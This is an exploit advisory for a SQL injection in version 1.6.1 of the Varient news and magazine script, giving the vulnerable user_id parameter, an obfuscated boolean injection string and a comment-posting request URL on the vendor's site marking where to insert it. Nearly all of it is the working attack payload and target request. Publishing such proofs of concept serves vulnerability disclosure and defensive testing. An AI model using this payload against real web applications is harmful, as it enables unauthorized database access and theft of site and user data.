Share
๏ปฟ===========================================================================================  
# Exploit Title: Varient 1.6.1 SQL Inj.  
# Dork: N/A  
# Date: 29-06-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://varient.codingest.com/  
# Software Link: https://varient.codingest.com/  
# Version: v1.6.1  
# Category: Webapps  
# Tested on: Wamp64, Windows  
# CVE: N/A  
# Software Description: the best news and magazine script  
===========================================================================================  
# POC - SQLi  
# Parameters : user_id  
# Attack Pattern :  
%27)/**/oR/**/3211170=3211170/**/aNd/**/(%276199%27)=(%276199  
# POST Method :  
https://varient.codingest.com/unpleasant-nor-diminution-excellence-apartments-imprudence?parent_id=0&post_id=66&name=9956574&comment=[COMMENT  
HERE]7146048&user_id=99999999[SQL INJECT HERE]  
===========================================================================================